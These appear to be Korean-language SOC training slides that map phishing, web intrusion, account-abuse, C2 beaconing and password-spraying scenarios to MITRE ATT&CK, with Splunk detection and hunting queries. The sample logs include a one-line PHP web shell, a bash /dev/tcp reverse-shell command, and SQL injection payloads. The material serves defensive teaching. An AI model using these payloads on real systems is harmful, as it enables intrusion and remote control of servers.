근거: Base64 인코딩된 PowerShell 커맨드 라인
T1105 Ingress Tool Transfer
근거: Invoke-WebRequest로 외부 실행 파일 다운로드
T1036.005 Match Legitimate Name
근거: 저장 파일명 svchost32.exe — 정상 svchost 위장

⚠️ 핵심 판단 포인트:
도메인 생성일(2024-11-01, 2주 전) + HK 국가 + VirusTotal 8/94 악성 → 즉시 차단 및 해당 파일 격리 조치 필요

보강 설명 PowerShell이 외부에서 페이로드를 다운로드하는 단계는 T1105 Ingress Tool Transfer의 전형적인 패턴입니다. 다운로드 URL의 도메인 생성일, 평판, 지역을 확인하는 것이 중요합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1105T1059.001T1105 Ingress Too…

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1105 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

피싱 시나리오 Step 5~6: 내부 정찰 & C2 Beaconing

내부 환경 파악 후 C2 통신 채널 수립 — 이 시점이 탐지의 마지막 기회

PART 4 · 피싱 시나리오

# EDR 커맨드 실행 로그 (Step 5 — Discovery) svchost32.exe spawns: cmd.exe /c systeminfo # T1082 cmd.exe /c net user # T1087 cmd.exe /c net localgroup administrators cmd.exe /c ipconfig /all # T1016 cmd.exe /c net view # T1018 cmd.exe /c tasklist # T1057

# Proxy 로그 (Step 6 — C2 Beaconing) 09:45:01 POST https://update-cdn.net/api/v2/check 09:47:01 POST https://update-cdn.net/api/v2/check 09:49:01 POST https://update-cdn.net/api/v2/check → 120초 간격 정확 반복 (Beaconing) Body size: 312 bytes (일정, 암호화됨)

ATT&CK 매핑

T1082 System Information Discovery
근거: systeminfo, ipconfig 실행
T1087 Account Discovery
근거: net user, net localgroup 실행
T1018 Remote System Discovery
근거: net view로 내부 시스템 열거
T1071.001 HTTPS C2
근거: 120초 정확 주기 POST 반복 (Beaconing)

🚨 Beaconing 탐지 핵심: 정확한 시간 주기 + 일정한 패킷 크기 + 동일 엔드포인트 반복 = C2 Beaconing High Confidence

보강 설명 내부 정찰과 C2 통신이 시작된 단계입니다. 이 시점에서 공격자는 이미 내부에 안정적으로 자리를 잡았습니다. Beaconing 패턴(주기적 HTTPS 통신)을 탐지하는 것이 이 단계의 핵심입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1082T1071.001T1082 systeminfo

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1082 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

피싱 시나리오 전체 ATT&CK 매핑표 & 보고 문장

이벤트를 나열하는 것이 아니라 공격 흐름을 설명하는 보고 문장을 만들어야 한다

PART 4 · 피싱 시나리오

시간	관측 행위	Tactic	Technique	Confidence	다음 액션
09:23	스피어피싱 메일 수신 (.xlsm)	Initial Access	T1566.001	High	메일 격리, 발신 도메인 차단
09:31	엑셀 매크로 실행	Execution	T1204.002	High	해당 파일 해시 전체 배포 차단
09:31	PowerShell -Enc 실행	Execution	T1059.001	High	PowerShell Script Block 로그 분석
09:31	svc.exe 외부 다운로드	Execution	T1105	High	다운로드 URL 차단, 파일 격리
09:44	systeminfo/net 명령 대량 실행	Discovery	T1082+T1087+T1018	High	해당 호스트 격리, 범위 파악
09:45~	120초 주기 HTTPS POST	C&C	T1071.001	High	C2 도메인 차단, 세션 종료

📝 30초 보고 문장 (시작→진행→영향→다음행동):
"2024년 11월 15일 오전, 재무팀 직원이 스피어피싱 첨부파일(.xlsm)을 실행해 Initial Access(T1566.001)가 성공했습니다. 이후 PowerShell로 외부 페이로드를 다운로드하고(T1105), 내부 정찰(T1082·T1087)을 거쳐 C2 Beaconing(T1071.001)이 120초 주기로 확인되었습니다. 현재 해당 호스트를 격리하고 C2 도메인을 차단했으며, Lateral Movement 흔적 추가 조사 중입니다."

보강 설명 피싱 시나리오 전체를 하나의 표와 보고 문장으로 정리합니다. 수강생이 직접 이 보고 문장을 말해보게 하는 것이 효과적입니다. 분석가는 이벤트를 나열하는 사람이 아니라 공격 흐름을 설명하는 사람입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

전체 매핑표보고 문장공격 흐름 설명

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

PART 5

시나리오 분석 2
웹 취약점 침투 시나리오

SQLi 공격 → 웹쉘 업로드 → 서버 루트 권한 획득 → 내부 이동 체인을 로그로 재구성한다

⏱️ 약 45분 📌 T1190 → T1505.003 → T1059 → T1021 📌 access.log · WAF 로그 분석

웹 침투 시나리오: SQLi 탐지 & 웹쉘 업로드

access.log + WAF 로그로 T1190 Exploit Public-Facing Application 확인

PART 5 · 웹 침투 시나리오

# access.log — SQLi 탐지 패턴 (T1190) 203.0.113.99 - - [15/Nov/2024:10:02:31] "GET /product?id=1' OR '1'='1 HTTP/1.1" 200 4821 203.0.113.99 - - [15/Nov/2024:10:02:34] "GET /product?id=1 UNION SELECT 1,user(),3-- HTTP/1.1" 200 203.0.113.99 - - [15/Nov/2024:10:02:38] "GET /product?id=1; DROP TABLE users-- HTTP/1.1" 500 # 웹쉘 업로드 (T1505.003) 203.0.113.99 - - [15/Nov/2024:10:14:52] "POST /upload/profile HTTP/1.1" 200 Filename: profile.php Size: 1.2KB Content: <?php system($_GET['cmd']); ?>

ATT&CK 매핑

T1190 Exploit Public-Facing Application
근거: SQLi 패턴(OR '1'='1, UNION SELECT) 연속 시도
T1505.003 Web Shell
근거: .php 파일 업로드 + system() 함수 포함 내용

탐지 보강 포인트

WAF가 SQLi 차단했는지 확인 → 차단 실패 시 실제 DB 쿼리 여부 확인
업로드 디렉토리 실행 권한 확인 → 웹쉘 동작 가능 여부
파일 업로드 허용 확장자 정책 위반 여부 (.php 허용?)

보강 설명 웹 공격은 access.log에서 SQLi 패턴 → 웹쉘 업로드 → 웹쉘 실행 순서로 흔적이 남습니다. Module 4 지식을 여기서 ATT&CK 매핑으로 전환하는 것이 핵심입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1190SQLi 패턴access.log

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1190 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

웹 침투 시나리오: 웹쉘 실행 & 내부 이동

웹쉘 활성화 후 리버스 쉘 → 내부 이동으로 이어지는 체인

PART 5 · 웹 침투 시나리오

# 웹쉘 실행 요청 (T1505.003 활용) 203.0.113.99 - [15/Nov/2024:10:17:03] "GET /upload/profile.php?cmd=id HTTP/1.1" 200 "GET /upload/profile.php?cmd=whoami HTTP/1.1" 200 "GET /upload/profile.php?cmd=uname+-a HTTP/1.1" 200 # 리버스 쉘 연결 (T1059.004) "GET /upload/profile.php?cmd= bash+-i+>&+/dev/tcp/203.0.113.99/4444+0>&1" # EDR: 웹 서버 프로세스 이상 자식 apache2 spawns bash PID=7821 bash spawns ssh 10.10.10.50 # 내부 이동!

ATT&CK 매핑

T1505.003 Web Shell 실행
근거: ?cmd= 파라미터로 OS 명령 실행 확인
T1059.004 Unix Shell
근거: bash -i 리버스 쉘 명령, /dev/tcp 연결
T1021.004 SSH Lateral Movement
근거: apache2 → bash → ssh 10.10.10.50 내부 이동

🚨 즉시 대응:
① 웹쉘 파일 즉시 삭제 및 격리
② 웹 서버 → 내부 SSH 연결 차단
③ 10.10.10.50 대상 서버 접근 로그 조사
④ 웹 서버 전체 파일 무결성 검사

보강 설명 웹쉘이 실행되면 공격자는 웹 서버를 통해 내부 시스템을 제어할 수 있습니다. 웹쉘 → 리버스 쉘 → 내부 이동은 매우 빠르게 진행됩니다. 서버 프로세스 로그와 네트워크 로그를 교차해야 합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1505.003T1059T1021

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1505.003 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

PART 6

시나리오 분석 3
정상 계정 악용 시나리오

탈취된 자격증명으로 VPN 접속 → 내부 시스템 접근 → 데이터 수집 — 탐지가 가장 어려운 유형

⏱️ 약 35분 📌 T1078 → T1133 → T1005 → T1567 📌 행위 기반 · 맥락 기반 탐지

정상 계정 악용 시나리오: VPN 이상 접속 탐지

정상 자격증명이지만 시간·위치·행동 패턴이 이상 — 맥락 기반 분석이 유일한 탐지 수단

PART 6 · 계정 악용 시나리오

# VPN 인증 로그 2024-11-16 03:14:22 VPN LOGIN SUCCESS User: lee.minjun Src IP: 185.234.72.19 (RO - Romania) Device: Unknown-Device-7821 (신규 디바이스) MFA: NOT REQUIRED (MFA 미적용 계정) # 이전 30일 접속 패턴 (baseline) 평균 접속: 09:00-18:00 KST 접속 국가: KR (100%) 사용 디바이스: LAPTOP-LEE01 (동일) → 모든 지표가 baseline 이탈!

ATT&CK 매핑

T1078.003 Local Accounts (Valid Accounts)
근거: 정상 자격증명 사용 성공 — 단 모든 맥락 이상
T1133 External Remote Services
근거: VPN 채널을 통한 내부 접근
T1110.004 Credential Stuffing (의심)
근거: 탈취된 자격증명 활용 가능성 — Medium Confidence

⚠️ 3가지 이상 지표:
① 새벽 3시 (업무 외 시간)
② 루마니아 IP (평소 한국만)
③ 미등록 신규 디바이스
→ 즉시 사용자 확인 및 세션 일시 중지 검토

보강 설명 정상 자격증명을 사용하는 공격은 행위 기반 탐지가 핵심입니다. 로그인 자체는 정상이지만 접속 시간, 위치, 이후 행동 패턴이 이상합니다. 이 세 가지를 묶어서 봐야 탐지가 가능합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1078T1133T1078 Valid Accou…

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1078 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

정상 계정 악용 — 데이터 수집 & 외부 유출

VPN 접속 후 민감 파일 대량 접근 → 개인 클라우드 스토리지 업로드

PART 6 · 계정 악용 시나리오

# 파일 서버 접근 로그 (T1005/T1039) 03:15~03:47 \\fileserver\HR\ 직원명부_2024.xlsx accessed 급여대장_2024Q3.xlsx accessed 퇴직자_DB.xlsx accessed 계약서_전체.zip copied 총 접근: 847개 파일 / 32분 내 # CASB 로그 (T1567 — Exfiltration) 03:51:14 UPLOAD personal.dropbox.com archive_2024.zip 2.8GB User: lee.minjun@company.com → 비승인 개인 클라우드 업로드!

ATT&CK 매핑

T1039 Data from Network Shared Drive
근거: 파일 서버 HR 폴더 847개 파일 접근
T1560 Archive Collected Data
근거: archive_2024.zip 2.8GB 생성
T1567.002 Exfiltration to Cloud Storage
근거: 비승인 Dropbox 계정에 2.8GB 업로드

🚨 즉시 대응:
① Dropbox 세션 종료 요청 (CASB API)
② lee.minjun 계정 즉시 비활성화
③ 사용자 본인 확인 연락 (여행 중 여부 등)
④ 접근 파일 민감도 분류 및 법무 검토

보강 설명 정상 계정으로 접속 후 민감 파일에 대량 접근하고 외부로 전송하는 패턴입니다. 이 단계에서 DLP와 CASB 연동이 중요합니다. 사용자에게 직접 확인하는 절차도 중요한 판단 요소입니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1005T1567T1005 데이터 수집

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1005 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

PART 7

시나리오 분석 4
C2 Beaconing 탐지

DNS · Proxy · NetFlow 로그를 교차 분석해 비정상 C2 통신 패턴을 탐지하는 방법론

⏱️ 약 25분 📌 T1071 · T1573 · T1568 📌 주기성 · 희귀성 · 프로세스 맥락

C2 Beaconing 탐지: 세 가지 핵심 관점

주기성 · 크기 일정성 · 희귀 도메인 — 세 가지를 함께 봐야 C2 Beaconing High Confidence 달성

PART 7 · Beaconing 탐지

 관점 1: 주기성(Periodicity)
일정한 시간 간격 반복 → C2 Beacon 강력 지표
예: 정확히 60초, 120초, 300초 간격
약간의 지터(jitter) 추가는 탐지 회피 목적
분석 도구: 연속 패킷 간격 표준편차 계산
오탐: NTP 동기화, 업데이트 에이전트


 관점 2: 크기 일정성
패킷/요청 크기가 일정 → 자동화된 C2 지표
사람의 실제 브라우징은 크기가 매우 다양
요청 Body 크기 분포 분석으로 탐지
분석: 1시간 내 요청 크기 분산이 낮은 연결
오탐: API 헬스체크, 모니터링 에이전트 핑


 관점 3: 희귀 도메인
조직 내 첫 방문 도메인 → 의심 대상
DGA 도메인: 무작위 문자열, 새로 등록됨
TI 피드에 악성 판정 여부 확인
도메인 연령(생성일), 등록자 정보 확인
JA3/JA3S TLS 지문 이상 여부 확인

# Proxy 로그 — Beaconing 패턴 14:00:01 POST api.cdn-update[.]net/v3/ping 312B 14:02:01 POST api.cdn-update[.]net/v3/ping 312B 14:04:01 POST api.cdn-update[.]net/v3/ping 314B 14:06:01 POST api.cdn-update[.]net/v3/ping 312B → 120초 주기, ~312B 크기 일정, 4시간 지속

🚨 판단: 주기성(120초) + 크기 일정(~312B) + 희귀 도메인(cdn-update[.]net, 2주 전 등록) + 4시간 지속 = C2 Beaconing High Confidence
→ T1071.001 Application Layer Protocol (HTTPS)

보강 설명 Beaconing 탐지는 주기성, 크기 일정성, 희귀 도메인의 세 가지 관점에서 접근합니다. 정상 트래픽도 주기적일 수 있으므로 프로세스 맥락과 도메인 평판을 함께 봐야 합니다. 시간 순서와 후속 조치를 같이 보면 공격 흐름이 더 또렷해집니다.

Beaconing 주기성크기 일정성희귀 도메인

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

PART 8

시나리오 분석 5
Brute Force & Password Spraying

계정 잠금 임계값을 의도적으로 피하는 Password Spraying 탐지 — 실패 횟수보다 패턴이 중요

⏱️ 약 25분 📌 T1110 · T1110.003 Password Spraying 📌 로그인 실패 패턴 분석

Brute Force vs Password Spraying: 패턴 비교

탐지 방법이 다르다 — Brute Force는 수직(한 계정 집중), Spraying은 수평(다수 계정 분산)

PART 8 · Brute Force 시나리오

T1110.001 Brute Force (수직)

10:00:01 FAIL admin Password1 10:00:02 FAIL admin Password2 10:00:03 FAIL admin Password3 ... 10:02:45 FAIL admin (×1,000) → 계정 잠금 트리거! 탐지 쉬움

동일 계정에 반복 실패 → 계정 잠금 발생
탐지: 단일 계정 X회 이상 실패 임계값

T1110.003 Password Spraying (수평)

10:00:01 FAIL admin Summer2024! 10:00:02 FAIL kim.jihye Summer2024! 10:00:03 FAIL lee.minjun Summer2024! 10:00:04 FAIL park.sooyeon Summer2024! 10:00:05 SUCCESS choi.junho Summer2024! → 계정 잠금 없음! 탐지 어려움

각 계정 1~2회만 시도 → 계정 잠금 안 됨
탐지: 동일 IP에서 여러 계정 시도 패턴

🚨 Password Spraying 탐지 쿼리 아이디어 (SIEM):
동일 Source IP에서 → 5분 내 → 10개 이상 다른 계정 → 각 계정 3회 미만 실패 → 패스워드 동일 OR 유사

보강 설명 Brute Force와 Password Spraying의 차이를 명확히 이해해야 합니다. Brute Force는 한 계정에 집중하고, Password Spraying은 여러 계정에 각각 1~2번만 시도합니다.… 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1110.001T1110.003T1110.001 Passwor…

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1110.001 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

PART 9

ATT&CK 기반
탐지 엔지니어링

Technique → Detection Strategy → Analytics → SIEM 쿼리 → 튜닝 사이클 전 과정

⏱️ 약 80분 📌 탐지 설계 방법론 📌 SIEM 쿼리 작성 · 오탐 튜닝

ATT&CK 기반 탐지 룰 설계 사이클

탐지 룰은 Technique를 운영 가능한 조건으로 번역한 결과물이다

PART 9 · 탐지 엔지니어링

① ATT&CK
Technique 선택

→

② Detection
Strategy 읽기

→

③ Data Source/
Component 확인

→

④ SIEM 쿼리
작성

→

⑤ 테스트 &
튜닝

→

⑥ 운영
모니터링

예시: T1110.003 Password Spraying 룰 설계

① Technique: T1110.003 Password Spraying
② Detection Strategy: "동일 소스에서 여러 계정 로그인 실패 패턴 모니터링"
③ Data Source: Logon Session / User Account Authentication
③ Data Component: Logon Session Creation (실패 이벤트)
④ 로그 원천: Windows EventID 4625 (로그인 실패)

SIEM 쿼리 (Splunk 예시)

index=winevent EventCode=4625 | bucket _time span=5m | stats dc(TargetUserName) as unique_accounts count as total_failures by _time, IpAddress | where unique_accounts > 10 AND total_failures < unique_accounts * 3 # 10개 이상 계정, 계정당 3회 미만 → Spraying

보강 설명 탐지 룰은 Technique를 운영 가능한 조건으로 번역한 결과물입니다. ATT&CK → Detection Strategy → Data Source 확인 → Analytics → SIEM 쿼리 → 튜닝 사이클로… 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

탐지 설계 사이클Detection StrategyAnalytics

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
탐지 설계 사이클·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

탐지 룰 오탐 튜닝: 품질을 높이는 세 가지 방법

룰을 만드는 것보다 튜닝하는 것이 더 중요 — 오탐이 많으면 경보 피로가 생긴다

PART 9 · 탐지 엔지니어링

 방법 1: 화이트리스트알려진 정상 소스(자산관리 서버, 취약점 스캐너) IP 제외
알려진 정상 서비스 계정 제외
예외 목록은 주기적으로 검토 (만료 설정)

# NOT IpAddress IN (스캐너IP목록)
# NOT TargetUserName IN (서비스계정)

 방법 2: 임계값 조정
너무 낮은 임계값 → 오탐 과다
너무 높은 임계값 → 탐지 누락
환경 baseline을 보고 적절한 값 설정
시간대별 다른 임계값 적용 (새벽 vs 업무시간)


 방법 3: 맥락 조건 추가
시간 조건: 업무 외 시간에만 경보
위치 조건: 평소 없는 국가 IP에만 경보
후속 조건: 실패 후 성공까지 이어질 때만
조합 조건: 여러 지표가 동시에 충족될 때

💡 튜닝 사이클: 룰 배포 → 1주간 경보 분석 → 오탐 원인 파악 → 화이트리스트/임계값/조건 조정 → 재배포. 이 사이클을 반복해야 품질이 올라갑니다

보강 설명탐지 룰을 만들면 반드시 오탐이 발생합니다. 오탐을 줄이는 튜닝 과정이 룰 품질을 결정합니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아집니다.

오탐 튜닝화이트리스트임계값 조정

설계 포인트

오탐 튜닝에 필요한 Data Source를 먼저 정리하기
화이트리스트를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

PART 10

Threat Hunting &
Coverage 분석 워크숍

경보를 기다리지 않고 가설로 빈 구간을 찾는다 — ATT&CK 기반 헌팅과 Coverage 공백 분석

⏱️ 약 70분 📌 헌팅 방법론 · 가설 수립 📌 Coverage 공백 식별 · 개선 계획

ATT&CK 기반 Threat Hunting 방법론

Hunting = 경보를 기다리는 일이 아니라, 가설로 탐지 공백을 찾는 능동적 작업

PART 10 · Threat Hunting

헌팅 트리거 선택

CTI 인텔리전스, 최근 인시던트 패턴, ATT&CK 커버리지 공백 중 하나에서 출발

가설 수립 (Hypothesis)

"만약 공격자가 T1053 Scheduled Task로 Persistence를 수립했다면, 새벽에 생성된 예약 작업이 비정상 바이너리를 실행했을 것이다"

데이터 수집 & 탐색

SIEM/EDR에서 관련 데이터 쿼리. 정상 baseline과 비교. 이상 항목 식별.

발견(Finding) → 대응

의심 이벤트 발견 시 → 인시던트 대응 절차 진입. ATT&CK 매핑과 보고서 작성.

미발견 → Coverage 개선

탐지 공백이면 → 로그 수집 계획, 탐지 룰 추가 계획. Coverage 백로그에 등록.

좋은 헌팅 가설의 조건

특정 ATT&CK Technique에 연결됨
실제 데이터로 테스트 가능
발견·미발견 모두 가치 있음
환경 맥락(자산, 업무 패턴)을 반영
시간 범위가 명시됨 (최근 30일 등)

💡 헌팅 ≠ 탐지 룰 실행
탐지 룰은 알려진 패턴을 자동 탐지하고, 헌팅은 아직 룰이 없는 미지의 패턴을 분석가가 능동적으로 찾는 것입니다.

보강 설명 Threat Hunting은 기술이 아니라 사고방식입니다. 가설을 세우고 데이터를 탐색하며 발견하거나 미발견을 기록합니다. 미발견도 중요한 Coverage 정보가 됩니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

헌팅 사이클가설 수립데이터 탐색

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
헌팅 사이클·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

헌팅 플레이북 작성 예시: T1053 Scheduled Task 헌팅

플레이북 = 다른 분석가도 동일한 헌팅을 반복할 수 있는 구조화된 절차 문서

PART 10 · Threat Hunting

헌팅 ID	HUNT-2024-021
ATT&CK	T1053.005 Scheduled Task
가설	공격자가 야간에 예약 작업을 생성해 비표준 경로 바이너리를 실행했을 것이다
트리거	최근 CTI 보고서: APT-X 그룹이 Scheduled Task Persistence 사용
데이터 원천	Windows EventID 4698 (작업 등록), Sysmon EventID 1 (프로세스 생성)
탐색 기간	최근 30일
판단 기준	비표준 경로(%TEMP%, %APPDATA%), 비업무 시간 등록, 알 수 없는 작성자

# 헌팅 쿼리 (Splunk) index=winevent EventCode=4698 | eval hour=strftime(_time, "%H") | where (hour < 7 OR hour > 20) # 야간 | search TaskContent IN ("*\\Temp\\*", "*\\AppData\\*") | table _time, ComputerName, SubjectUserName, TaskName, TaskContent

결과 기록 양식

실행일: 2024-11-20
발견: 3건 (2건 정상 확인, 1건 추가 조사)
Coverage 평가: EventID 4698 수집 확인 → Score 2
개선 사항: Sysmon Rule 추가로 Score 3 목표

보강 설명 헌팅 플레이북은 다른 분석가도 같은 헌팅을 반복할 수 있도록 절차를 문서화한 것입니다. 가설, 데이터 원천, 쿼리, 판단 기준, 결과 기록 양식을 포함해야 합니다. 조건·예외·후속 조치를 같이 봐야 탐지 품질이 올라갑니다.

T1053헌팅 플레이북가설 문서화

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1053·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

Coverage 워크숍: 주요 Technique 현황 평가표

내 환경 기준으로 0~3 점수를 매기고 탐지 공백을 식별한다

PART 10 · Coverage 워크숍

Technique	ID	로그 보유	탐지 룰	검증 여부	현재 점수	목표 점수	Gap 이유
Phishing Attachment	T1566.001	✓ 메일GW	✓ 있음	△ 미검증	2	3	Purple Team 테스트 필요
PowerShell Execution	T1059.001	✓ Sysmon	✓ 있음	✓ 검증	3	3	—
Scheduled Task	T1053.005	✓ WinEvent	✗ 없음	✗	1	3	탐지 룰 작성 필요
Web Shell	T1505.003	△ 부분	△ 부분	✗	1	3	웹 파일 감사 로그 추가 필요
Pass the Hash	T1550.002	✗ 없음	✗ 없음	✗	0	2	NetLogon 로그 수집 미설정
Kerberoasting	T1558.003	✓ DC 로그	✗ 없음	✗	1	3	TGS 대량 요청 룰 필요
Exfil via Web Svc	T1567	✓ CASB	△ 부분	✗	1	2	승인된 SaaS 화이트리스트 정리
Defense Evasion - Log Clear	T1070.001	✓ WinEvent	✓ 있음	✓ 검증	3	3	—

⚠️ 워크숍 과제: 위 표에서 점수 0~1인 항목을 3개 선택 → 개선 방법과 소요 리소스를 팀별로 논의하고 발표

보강 설명 Coverage 워크숍에서 수강생이 직접 자신의 환경을 기준으로 Coverage를 평가해 봅니다. 0~3 점수를 매기고, 가장 시급한 공백을 식별하는 것이 목표입니다. 로그가 없어서 0점인 것과, 로그는 있지만… 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

Coverage 평가0~3 점수탐지 공백

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
Coverage 평가를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

Coverage 공백에서 개선 계획 도출하기

모든 공백을 동시에 메울 수 없다 — 위협 가능성 × 자산 중요도로 우선순위를 결정한다

PART 10 · Coverage 워크숍

우선순위 결정 기준

위협 가능성: 최근 CTI에서 자주 언급되는 Technique인가?
자산 중요도: 이 Technique가 사용되면 영향받는 자산이 중요한가?
탐지 용이성: 로그를 추가 수집하면 빠르게 룰 구현 가능한가?
현재 점수: 0점(로그도 없음)이 1점(룰만 없음)보다 우선

개선 유형별 액션

점수 0 → 1: 로그 수집 설정 추가 (Sysmon, Audit Policy 변경)
점수 1 → 2: 탐지 룰 작성 (SIEM 쿼리, Sigma Rule)
점수 2 → 3: Purple Team 또는 Atomic Red Team으로 검증

Technique	현재	액션	담당	기한
